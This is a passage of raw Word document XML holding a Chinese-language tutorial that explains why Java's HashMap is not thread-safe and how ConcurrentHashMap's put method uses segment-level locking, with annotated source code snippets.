              </w:rPr>
              <w:t>，并将它加入到当前的桶后面的链表中</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>    }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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 xml:space="preserve">　　其实这个方法很简单，首先来判断当前的桶的大小，如果觉得太小的话，那么需要扩充当前桶的大小，这样可以让添加元素存放的更离散化一些，优化擦入和寻找的效率。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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 xml:space="preserve">　　然后就是创建一个新的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，用于保存要擦入的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，然后再将其链到应该放的桶的链表上就好了。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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 xml:space="preserve">　　好了，到这里位置，整个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的擦入元素的过程就已经看的很清楚了，在整个这个过程中没有看到有加锁的过程，因此可以说明</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>是不支持并发的，不是线程安全的，在并发的环境下使用会产生一些不一致的问题。。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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 xml:space="preserve">　　因此</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>新的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>类库中就有了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>用于在并发环境中使用。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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 xml:space="preserve">　　那么我们再来看看</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>操作是怎么搞的吧：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8317" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:bottom w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:right w:val="single" w:sz="24" w:space="0" w:color="999999"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8317"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidTr="00223A40">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="00223A40">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>    public V put(K key, V value) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        Segment&lt;K,V&gt; s;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        if (value == null)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            throw new NullPointerException();</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        int hash = hash(key);  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>hash</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>值</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        int j = (hash &gt;&gt;&gt; segmentShift) &amp; segmentMask;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        if ((s = (Segment&lt;K,V&gt;)UNSAFE.getObject          // nonvolatile; recheck</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>             (segments, (j &lt;&lt; SSHIFT) + SBASE)) == null) //  in ensureSegment  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>用于获取相应的片段</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            s = ensureSegment(j);   //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>这里表示没有这个片段，那么需要创建这个片段</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>        return s.put(key, hash, value, false);  //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>这里就有分段加锁的策略</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>    }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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 xml:space="preserve">　　这里刚开始跟</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>都差不太多吧，无非是先获取当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>值，但是接下来进行的工作就不太一样了，这里就有了一个分段的概念：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>将整个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>桶进行了分段，也就是将这个大的数组分成了几个小的片段，而且每个小的片段上面都有锁存在，那么在擦入元素的时候就需要先找到应该插入到哪一个片段，然后再在这个片段上面进行擦入，而且这里还需要获取锁。。。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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 xml:space="preserve">　　那我们来看看这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>方法吧：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8317" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:bottom w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:right w:val="single" w:sz="24" w:space="0" w:color="999999"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8317"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidTr="00223A40">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="00223A40">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="240"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>final V put(K key, int hash, V value, boolean onlyIfAbsent) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>         //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>这里的锁是计数锁，同一个锁可以被同一个线程获取多次，但是不能被不同的线程获取</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>            HashEntry&lt;K,V&gt; node = tryLock() ? null :   //</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>如果获取了当前的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>segment</w:t>
            </w:r>
